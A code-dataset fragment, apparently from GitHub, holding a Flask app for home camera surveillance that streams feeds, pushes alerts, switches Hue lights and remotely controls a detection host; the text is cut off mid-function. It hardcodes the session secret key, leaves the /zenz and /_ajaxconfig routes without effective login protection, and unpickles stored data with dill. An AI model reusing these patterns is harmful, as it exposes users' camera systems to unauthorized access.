text_classifier.predict(X_test)\r\n\r\nprint(confusion_matrix(y_test,predictions))\r\n\r\nprint(classification_report(y_test,predictions))\r\n\r\nprint(accuracy_score(y_test, predictions))","repo_name":"kalyankumar0249/Customer-Sentiment-analysis-on-Sprint-and-T-Mobile-merger","sub_path":"twitteranalysis.py","file_name":"twitteranalysis.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71425867321","text":"#!/home/stephan/.virtualenvs/cvp0/bin/python\nimport sys\nsys.path.append(\"../../lib\")\n\nfrom flask import Flask, render_template, request, send_from_directory, jsonify, flash, url_for, redirect, Response, session, g\nfrom flask_session import Session\nfrom flask_sse import sse\nfrom threading import Thread\nfrom bson.objectid import ObjectId\nimport os\nimport models\nimport zmq\nimport cv2\nimport time\nimport requests\nimport configparser\nimport guckmongo\nimport zenzlib\nimport huelib\nimport threading\nimport flask_login\nfrom hasher import hash_password, check_password, read_hashfile, write_hashfile\nimport json\nimport numpy as np\nimport urllib.request\nfrom requests.auth import HTTPBasicAuth\nimport dill\nimport datetime\nimport ephem\n\nsocketstate = None\nCHATEDIT_INDEX = -1\n\n# try to get config & DB\ntry:\n dbconfig = configparser.ConfigParser()\n dbconfig.read(\"../../data/mongo_default/mongo_url.cfg\")\n dburl = dbconfig[\"CONFIG\"][\"DB_URL\"].rstrip()\n dbname = dbconfig[\"CONFIG\"][\"DB_NAME\"].rstrip()\n DB = guckmongo.ConfigDB(dburl, dbname)\nexcept Exception as e:\n print(str(e) + \": Cannot get WASTL config for DB, exiting ...\")\n sys.exit()\n\n# init Hue\nHUE = huelib.Hue()\n\n# init flask\napp = Flask(__name__)\napp.secret_key = \"dfdsmdsv11nmDFSDfds\"\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config[\"REDIS_URL\"] = \"redis://ubuntuvm1.iv.at\"\napp.register_blueprint(sse, url_prefix='/stream')\nSession(app)\n\n\n# Login Manager\nlogin_manager = flask_login.LoginManager()\nlogin_manager.init_app(app)\n\n# Passwords\nhashfile = \"../../data/hash.pw\"\nusers = read_hashfile(hashfile)\n\n\ndef get_hue_onoff(h):\n g = h.get_all_groups()\n gs = h.get_groups_status(g)\n stat = True\n for gs0 in gs:\n if not gs0:\n stat = False\n break\n return stat\n\n\n# Camera: http url jpg\nclass Camera(object):\n def __init__(self, camnr, interval=0):\n self.interval = interval\n cursor = DB.db_getall(\"cameras\")\n cameralist = [cn[\"url\"] for cn in cursor]\n self.surl = cameralist[camnr]\n self.r = requests.get(self.surl, stream=True)\n self.lasttime = time.time()\n self.bytes = b''\n\n def restart(self):\n self.r = requests.get(self.surl, stream=True)\n\n def get_frame(self):\n try:\n for chunk in self.r.iter_content(chunk_size=1024):\n self.bytes += chunk\n a = self.bytes.find(b'\\xff\\xd8')\n b = self.bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = self.bytes[a:b+2]\n self.bytes = self.bytes[b+2:]\n if time.time() - self.lasttime >= self.interval:\n frame = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n ret, jpeg = cv2.imencode('.jpg', frame)\n self.lasttime = time.time()\n return ret, jpeg.tobytes()\n else:\n return False, None\n except:\n return False, None\n\n\n# Camera stream with yield\ndef gen(camera):\n global frame0\n while True:\n try:\n ret, frame = camera.get_frame()\n time.sleep(0.01)\n if ret and frame is not None:\n yield (b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n except:\n return\n\n\n# start WastlAlarmClient Thread\nclass PushThread(Thread):\n def __init__(self, app, DB0, HUE0, timeout=7200):\n Thread.__init__(self)\n self.daemon = True\n self.was = zenzlib.WastlAlarmClient()\n self.connector = zenzlib.Connector()\n self.app = app\n self.stop = True\n self.DB = DB0\n self.timeout = timeout\n self.guckstatus = False\n self.HUE = HUE0\n\n def run(self):\n o = ephem.Observer()\n o.lat = self.DB.db_query(\"ephem\", \"lat\")\n o.long = self.DB.db_query(\"ephem\", \"long\")\n sun = ephem.Sun()\n while True:\n # NEST\n # data = self.connector.send_to_connector(\"nest\", \"wastlinfo\", \"\", host=\"ubuntuvm1.iv,at\")\n # GUCK\n sent = False\n stat, data, paused = self.was.get_from_guck()\n try:\n # guck is running and data received\n if paused:\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=0, guckstatus=\"paused\", dackel=\"nobark\")\n type0 = \"paused\"\n sse.publish({\"message\": result0}, type=type0)\n elif stat:\n frame, tm = data\n cursor = self.DB.db.userdata.find()\n sent = True\n self.guckstatus = True\n # hue falls on_guck alert aktiviert\n if self.DB.db_query(\"hue\", \"schedule_type\") == \"5\":\n guckalarm = True\n if self.DB.db_query(\"hue\", \"onlynight\"):\n sun.compute()\n sunset0 = ephem.localtime(o.next_setting(sun))\n sunset = sunset0.hour + sunset0.minute/60\n sunrise0 = ephem.localtime(o.next_rising(sun))\n sunrise = sunrise0.hour + sunrise0.minute/60\n n0 = datetime.datetime.now()\n timedec = n0.hour + n0.minute/60\n if timedec > sunrise and timedec < sunset:\n guckalarm = False\n else:\n guckalarm = True\n if guckalarm:\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_on(gl)\n try:\n gdur = self.DB.db_query(\"hue\", \"guckdur\")\n except:\n gdur = 15\n for g0 in gl:\n HUE.set_schedule_timer(g0, gdur, False)\n for userd in cursor:\n user0 = userd[\"user\"]\n active = userd[\"active\"]\n if active:\n # append photolist and increase no_newdetections\n newd = userd[\"no_newdetections\"] + 1\n self.DB.db_update2(\"userdata\", \"user\", user0, \"no_newdetections\", newd)\n photol = userd[\"photolist\"]\n # data0 = dill.dumps(frame), tm\n photol.append(tm)\n self.DB.db_update2(\"userdata\", \"user\", user0, \"photolist\", photol)\n DB.db_open_one(\"photodata\", {\"tm\": tm, \"frame\": dill.dumps(frame)})\n # only send to current active user: nralarms and guckstatus=\"on\"\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=newd, guckstatus=\"on\", dackel=\"bark\")\n type0 = \"nrdet_\" + user0\n sse.publish({\"message\": result0}, type=type0)\n type0 = \"title_\" + user0\n sse.publish({\"message\": str(newd)}, type=type0)\n # if more than x photos, delete oldest in photodata and userdata[photolist]\n if DB.db_count(\"photodata\") > 15:\n # delete oldest entry in photodata\n mintm = DB.db_find_min(\"photodata\", \"tm\")\n DB.db_delete_one(\"photodata\", \"tm\", mintm)\n # delete also from all active users photolist\n for userd2 in cursor:\n user2 = userd2[\"user\"]\n photol = userd2[\"photolist\"]\n photol.remove(mintm)\n self.DB.db_update2(\"userdata\", \"user\", user2, \"photolist\", photol)\n if not paused:\n # guck not running -> send sse \"guckstatus: off\" (red) to all users\n if stat is False and data is not False:\n self.guckstatus = False\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=0, guckstatus=\"off\", dackel=\"nobark\")\n type0 = \"guck\"\n # print(type0)\n sse.publish({\"message\": result0}, type=type0)\n # guck running but no data received and no data sent -> send sse \"on\" ()\n else:\n if not sent:\n cursor = self.DB.db.userdata.find()\n self.guckstatus = True\n for userd in cursor:\n user0 = userd[\"user\"]\n active = userd[\"active\"]\n newd = userd[\"no_newdetections\"]\n if active:\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=newd, guckstatus=\"on\",\n dackel=\"nobark\")\n type0 = \"idle_\" + user0\n sse.publish({\"message\": result0}, type=type0)\n type0 = \"title_\" + user0\n sse.publish({\"message\": str(newd)}, type=type0)\n # if guck is running check for inactive users and set to inactive in case of\n if self.guckstatus:\n cursor = self.DB.db.userdata.find()\n for userd in cursor:\n lasttm = userd[\"lasttm\"]\n if time.time() - lasttm > self.timeout:\n user0 = userd[\"user\"]\n DB.db_update2(\"userdata\", \"user\", user0, \"active\", False)\n except Exception as e:\n print(\"Error @ \" + str(time.time()) + \": \" + str(e))\n time.sleep(1)\n\n\nPUSHT = PushThread(app, DB, HUE)\nPUSHT.start()\ncursor = DB.db.userdata.find()\nfor userd in cursor:\n DB.db_delete_one(\"userdata\", \"user\", userd[\"user\"])\ncursor = DB.db.photodata.find()\nfor photod in cursor:\n DB.db_delete_one(\"photodata\", \"tm\", photod[\"tm\"])\n\n\n@app.before_request\ndef beforerequest():\n try:\n user0 = flask_login.current_user.get_id()\n g.user = user0\n if user0 is not None:\n if not DB.db_find_one(\"userdata\", \"user\", user0):\n DB.db_open_one(\"userdata\", {\"user\": user0, \"lasttm\": time.time(), \"active\": True, \"no_newdetections\": 0,\n \"photolist\": []})\n else:\n DB.db_update2(\"userdata\", \"user\", user0, \"lasttm\", time.time())\n DB.db_update2(\"userdata\", \"user\", user0, \"active\", True)\n except Exception as e:\n print(str(e))\n pass\n\n\n# Login Manager\nclass User(flask_login.UserMixin):\n pass\n\n\n@login_manager.user_loader\ndef user_loader(email):\n if email not in users:\n return\n user = User()\n user.id = email\n return user\n\n\n@login_manager.request_loader\ndef request_loader(request):\n email = request.form.get('email')\n if email not in users:\n return\n user = User()\n user.id = email\n user.is_authenticated = check_password(users[email]['pw'], request.form[\"pw\"])\n return user\n\n\n# helper functions\ndef save_and_prepare_forms(db0, form0, formlist):\n for f in formlist:\n if f == form0:\n f.updatedb(DB)\n f.populateform(DB)\n\n\ndef flash_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(u\"Error in the %s field - %s\" % (\n getattr(form, field).label.text,\n error\n ))\n\n\n# Routes\n@app.route(\"/wastl.png\")\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'), 'wastl.ico', mimetype='image/vnd.microsoft.icon')\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\n@app.route(\"/home\", methods=['GET', 'POST'])\ndef index():\n return render_template(\"index.html\", userauth=flask_login.current_user.is_authenticated)\n\n\n@app.route('/video_feed//', defaults={\"interval\": 5})\n@app.route('/video_feed///')\ndef video_feed(camnr, interval=5):\n global gen0\n try:\n gen0.close()\n except:\n pass\n gen0 = gen(Camera(int(camnr)-1, int(interval)))\n ret = Response(gen0, mimetype='multipart/x-mixed-replace; boundary=frame')\n return ret\n\n\n# hier noch fullscreen!\n@app.route(\"/livecam/\", defaults={\"camnrstr\": 0, \"interval\": 2, \"toggle\": 0, \"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam//\", defaults={\"interval\": 2, \"toggle\": 0, \"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam///\", defaults={\"toggle\": 0, \"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam////\", defaults={\"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam////\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef livecam(camnrstr=0, interval=2, toggle=0, ptz=0):\n if request.method == \"GET\":\n ptz0 = int(ptz)\n camnr = int(camnrstr)\n cursor = DB.db_getall(\"cameras\")\n cameralist = [(cn[\"_id\"], cn[\"name\"], cn[\"photo_url\"], cn[\"url\"]) for cn in cursor]\n if ptz0 != 0 and len(cameralist)-1 >= camnr:\n cursor = DB.db_getall(\"cameras\")\n ptzlist = [(cn[\"_id\"], cn[\"ptz_up\"], cn[\"ptz_down\"], cn[\"ptz_left\"], cn[\"ptz_right\"]) for cn in cursor]\n _, ptz_up, ptz_down, ptz_left, ptz_right = ptzlist[camnr]\n ptzcommand = \"\"\n if ptz0 == 1:\n ptzcommand = ptz_up\n elif ptz0 == 2:\n ptzcommand = ptz_down\n elif ptz0 == 3:\n ptzcommand = ptz_left\n elif ptz0 == 4:\n ptzcommand = ptz_right\n if ptzcommand != \"\":\n try:\n requests.get(ptzcommand)\n except:\n pass\n return render_template(\"livecam.html\", cameralist=cameralist, camnr=camnr+1, speed=int(interval),\n toggle=int(toggle), ptz=0)\n elif request.method == \"POST\":\n pass\n\n\n@flask_login.login_required\n@app.route(\"/zenz\", methods=['GET', 'POST'])\ndef zenz():\n return render_template(\"zenz.html\")\n\n\n@app.route(\"/userlogin\", methods=['GET', 'POST'])\ndef userlogin():\n if request.method == \"GET\":\n userloginform = models.UserLoginForm(request.form)\n return render_template(\"login.html\", userloginform=userloginform, userauth=flask_login.current_user.is_authenticated)\n else:\n users = read_hashfile(hashfile)\n userloginform = models.UserLoginForm(request.form)\n email = userloginform.email.data\n pw = userloginform.password.data\n try:\n pw_hash = users[email][\"pw\"]\n except:\n return redirect(url_for(\"index\"))\n if check_password(pw_hash, pw):\n user = User()\n user.id = email\n flask_login.login_user(user)\n return render_template(\"index.html\")\n return redirect(url_for('index'))\n\n\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return redirect(url_for('index'))\n\n\n@app.route(\"/userlogout\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef userlogout():\n global USER\n flask_login.logout_user()\n USER = None\n return render_template(\"index.html\", userauth=flask_login.current_user.is_authenticated)\n\n\n@app.route(\"/detections\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef detections():\n global DB\n # delete all files in directory\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n detlist = []\n cursor = DB.db.userdata.find()\n for userd in cursor:\n user0 = userd[\"user\"]\n if user0 == g.user:\n photol = userd[\"photolist\"]\n thresh = 15\n for i, tm in enumerate(reversed(photol)):\n if i > thresh:\n break\n try:\n framedill = DB.db_find_one(\"photodata\", \"tm\", tm)[\"frame\"]\n frame = dill.loads(framedill)\n photoname = \"detphoto\" + tm + \".jpg\"\n detlist.append((photoname, tm))\n fn = \"./static/\" + photoname\n cv2.imwrite(fn, frame)\n except Exception:\n thresh += 1\n DB.db_update2(\"userdata\", \"user\", user0, \"no_newdetections\", 0)\n return render_template(\"detections.html\", detlist=detlist)\n\n\n@app.route(\"/guck//\", defaults={\"param1\": \"0\"}, methods=['GET', 'POST'])\n@app.route(\"/guck//\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef guck(menu1, param1):\n global socket\n global socketstate\n global DB\n\n if menu1 == \"photo\" or menu1 == \"system\" or menu1 == \"help\" or menu1 == \"status\" or menu1 == \"start\" or menu1 == \"stop\" or menu1 == \"runtime-settings\":\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n\n if menu1 == \"photo\":\n camlist = []\n pn = []\n # delete all files in directory\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n # just one photo or all?\n cursor = DB.db_getall(\"cameras\")\n nr_cameras = len([(cn[\"_id\"], cn[\"name\"], cn[\"enable\"]) for cn in cursor])\n # print(\"# cameras:\", nr_cameras)\n if int(param1) < nr_cameras:\n lowerbound = upperbound = int(param1)\n else:\n lowerbound = 0\n upperbound = nr_cameras - 1\n # loop over all cameras and save photos as .jpg\n j = 1\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n camsok = True\n for photoindex in range(lowerbound, upperbound + 1):\n sstr = \"photo \" + str(photoindex)\n ok, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if ok:\n rep0, repname, repfr = res0\n # save new .jpg\n tm = time.strftime(\"%a%d%b%Y%H:%M:%S\")\n photoname = \"jpgphoto\" + str(j) + tm + \".jpg\"\n pn.append(photoname)\n fn = \"./static/\" + photoname\n cv2.imwrite(fn, repfr)\n j += 1\n else:\n pn.append(False)\n camsok = False\n i = 0\n cursor = DB.db.cameras.find()\n for cam in cursor:\n camlist.append((str(i), cam[\"name\"], camsok))\n i += 1\n camlist.append((str(i), \"ALL CAMERAS\", camsok))\n return render_template(\"photo.html\", camlist=camlist, pn=pn, param1=param1, menu1=menu1)\n elif menu1 == \"runtime-settings\":\n stat, res0 = ZENZL.request_to_guck(\"gettgmode\", REMOTE_HOST, REMOTE_PORT)\n rtm = \"verbose\" in res0\n return render_template(\"runtime.html\", param1=param1, rtm=rtm)\n elif menu1 == \"start\":\n rep0 = []\n stat, rep = ZENZL.ping()\n if stat == 0:\n ZENZL.lanwake()\n rep0.append(rep)\n rep0.append(\"Guck host down, now booting up via WOL, pls try again in 1 min ...\")\n elif stat == 1:\n noservers = ZENZL.get_nr_instances()\n if noservers > 0:\n ZENZL.killguck()\n rep0.append(rep)\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n try:\n ZENZL.startguck()\n rep0.append(\"Starting guck at \" + REMOTE_HOST_SHORT)\n except Exception as e:\n rep0.append(str(e))\n # rep0 += \"\\nError in guck start up, possibly no ssh access to guck host ... ?\"\n else:\n rep0.append(\"Error in ping to guck host: \" + rep)\n return render_template(\"start.html\", rep0=rep0)\n elif menu1 == \"system\":\n # ping\n rep0 = []\n if param1 == \"1\":\n stat, rep = ZENZL.ping()\n if stat == -1:\n rep0.append(\"Error in ping to guck host: \" + str(rep))\n else:\n rep0.append(rep)\n # (re)start\n elif param1 == \"2\":\n stat, rep = ZENZL.ping()\n if stat == 0:\n ZENZL.lanwake()\n rep0.append(rep)\n rep0.append(\"Guck host down, now booting up via WOL, pls try again in 1 min ...\")\n elif stat == 1:\n noservers = ZENZL.get_nr_instances()\n if noservers > 0:\n ZENZL.killguck()\n rep0.append(rep)\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n try:\n ZENZL.startguck()\n rep0.append(\"Starting guck at: \" + REMOTE_HOST_SHORT)\n except Exception as e:\n rep0.append(str(e))\n # rep0 += \"\\nError in guck start up, possibly no ssh access to guck host ... ?\"\n else:\n rep0.append(\"Error in ping to guck host: \" + rep)\n # stop/shutdown\n elif param1 == \"3\" or param1 == \"10\" or param1 == \"11\":\n ZENZL.killguck()\n if param1 == \"3\":\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n if param1 == \"10\":\n ZENZL.shutdown()\n rep0.append(\"Killing guck, shutting down \" + REMOTE_HOST_SHORT)\n if param1 == \"11\":\n ZENZL.reboot()\n rep0.append(\"Killing guck and rebooting \" + REMOTE_HOST_SHORT)\n elif param1 in [\"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n res00 = \"\"\n if param1 == \"4\":\n sstr = \"pause\"\n elif param1 == \"5\":\n sstr = \"resume\"\n elif param1 == \"6\":\n sstr = \"quit\"\n elif param1 == \"7\":\n sstr = \"record start\"\n elif param1 == \"8\":\n sstr = \"record stop\"\n elif param1 == \"9\":\n sstr = \"clear\"\n cursor_user = DB.db.userdata.find()\n cursor_photo = DB.db.photodata.find()\n # delete photolist in userdata in DB\n for cu in cursor_user:\n user2 = cu[\"user\"]\n DB.db_update2(\"userdata\", \"user\", user2, \"photolist\", [])\n # delete all photodata in DB\n for cp in cursor_photo:\n id = cp[\"_id\"]\n DB.db_delete_one(\"photodata\", \"_id\", id)\n # delete all photos in Folder\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n res00 = \"and removing detection photos!\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if stat:\n rep, repname, repfr = res0\n rep0.append(rep + res00)\n else:\n rep0.append(res0 + res00)\n elif param1 == \"0\":\n rep0 = []\n param1 = \"1\"\n return render_template(\"system.html\", rep0=rep0, param1=param1, menu1=menu1)\n elif menu1 == \"stop\":\n ZENZL.killguck()\n rep0 = [\"Killing guck on \" + REMOTE_HOST_SHORT]\n return render_template(\"start.html\", rep0=rep0)\n elif menu1 == \"status\":\n sstr = \"status\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if stat:\n rep0, repname, repfr = res0\n else:\n rep0 = res0\n replist = rep0.split(\"\\n\")\n return render_template(\"status.html\", replist=replist, menu1=menu1)\n elif menu1 == \"config\":\n camlist = []\n tabchoice = \"basic\"\n if request.method == \"GET\":\n basicform = models.BasicForm(request.form)\n telegramform = models.TelegramForm(request.form)\n mailform = models.MailForm(request.form)\n ftpform = models.FTPForm(request.form)\n smsform = models.SMSForm(request.form)\n aiform = models.AIForm(request.form)\n photoform = models.PhotoForm(request.form)\n camerasform = models.CamerasForm(request.form)\n remoteform = models.RemoteForm(request.form)\n formlist = [telegramform, basicform, mailform, ftpform, smsform, aiform, photoform, camerasform, remoteform]\n for f in formlist:\n f.populateform(DB)\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n if request.method == 'POST':\n basicform = models.BasicForm(request.form)\n telegramform = models.TelegramForm(request.form)\n mailform = models.MailForm(request.form)\n ftpform = models.FTPForm(request.form)\n smsform = models.SMSForm(request.form)\n aiform = models.AIForm(request.form)\n photoform = models.PhotoForm(request.form)\n remoteform = models.RemoteForm(request.form)\n camerasform = models.CamerasForm(request.form)\n formlist = [telegramform, basicform, mailform, ftpform, smsform, aiform, photoform, camerasform, remoteform]\n # basic\n if (basicform.save.data):\n if basicform.validate_on_submit() or not basicform.doheartbeat.data:\n save_and_prepare_forms(DB, basicform, formlist)\n else:\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"basic\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # cameras\n elif (camerasform.camedit_t.data):\n if camerasform.validate_on_submit():\n # print(\"validate\")\n camerasform.copyajaxdata(DB)\n save_and_prepare_forms(DB, camerasform, formlist)\n else:\n flash_errors(camerasform)\n # print(\">>>\", camerasform.act_camera_id.data)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif camerasform.camadd_t.data:\n if camerasform.validate_on_submit():\n id0 = DB.db_open_one(\"cameras\", {\"name\": \"dummy0\", \"enable\": True})\n camerasform.updatedb(DB, idparam=id0)\n camerasform.copyajaxdata(DB)\n save_and_prepare_forms(DB, camerasform, formlist)\n else:\n print(\"Not validated!\")\n flash_errors(camerasform)\n camerasform.copyajaxdata(DB)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif camerasform.camcancel_t.data:\n camerasform.act_camera_id.data = \"-1\"\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n\n # telegram\n elif (telegramform.save_t.data):\n if telegramform.validate_on_submit() or not telegramform.dotelegram.data:\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, telegramform, formlist)\n else:\n flash_errors(telegramform)\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"telegram\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif telegramform.chatadd_t.data or telegramform.chatedit_t.data:\n cdata = telegramform.chatid_id.data\n chat_index = int(telegramform.chatedit_index.data)\n if cdata and telegramform.chatadd_t.data:\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n chatidlist.append(telegramform.chatid_id.data)\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n elif cdata and telegramform.chatedit_t.data and chat_index > -1:\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n chatidlist[chat_index] = telegramform.chatid_id.data\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n telegramform.chatedit_index.data = \"-1\"\n tabchoice = \"telegram\"\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, None, formlist)\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # mail\n elif (mailform.save_m.data):\n if mailform.validate_on_submit() or not mailform.domail.data:\n save_and_prepare_forms(DB, mailform, formlist)\n else:\n flash_errors(mailform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"mail\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # ftp\n elif (ftpform.save_f.data):\n if ftpform.validate_on_submit() or not ftpform.doftp.data:\n save_and_prepare_forms(DB, ftpform, formlist)\n else:\n flash_errors(ftpform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"ftp\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # sms\n elif (smsform.save_s.data):\n if smsform.validate_on_submit() or not smsform.dosms.data:\n save_and_prepare_forms(DB, smsform, formlist)\n else:\n flash_errors(smsform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"sms\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # photo\n elif (photoform.save_p.data):\n if photoform.validate_on_submit():\n save_and_prepare_forms(DB, photoform, formlist)\n else:\n flash_errors(photoform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"photo\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # remote\n elif (remoteform.save_r.data):\n if remoteform.validate_on_submit():\n save_and_prepare_forms(DB, remoteform, formlist)\n else:\n flash_errors(remoteform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"remote\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # ai\n elif (aiform.save_a.data):\n if aiform.validate_on_submit():\n save_and_prepare_forms(DB, aiform, formlist)\n else:\n flash_errors(aiform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"ai\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n else:\n replist = []\n return render_template(\"index.html\")\n\n\n@app.route(\"/_ajaxconfig\", methods=[\"GET\", \"POST\"])\ndef _ajaxconfig():\n global DB\n global PUSHT\n global HUE\n cmd = request.args.get(\"cmd\")\n index = request.args.get(\"index\", 0, type=int)\n if cmd == \"delete\":\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n if index >= 0 and index <= len(chatidlist)-1:\n del chatidlist[index]\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n telegramform = models.TelegramForm(request.form)\n telegramform.copyajaxdata(DB)\n telegramform.populateform(DB)\n result0 = render_template(\"config_chatid.html\", telegramform=telegramform)\n elif cmd == \"edit\":\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n telegramform = models.TelegramForm(request.form)\n telegramform.copyajaxdata(DB)\n telegramform.populateform(DB)\n telegramform.chatid_id.data = chatidlist[index]\n telegramform.chatedit_index.data = index\n result0 = render_template(\"config_chatedit.html\", telegramform=telegramform, chatedit=str(index+1))\n elif cmd == \"camedit\":\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = camerasform.cameralist[index]\n camerasform.populateform(DB)\n result0 = render_template(\"config_camedit.html\", camerasform=camerasform, camedit_action=\"edit\",\n cid=camerasform.act_camera_id.data)\n elif cmd == \"camdelete\":\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = 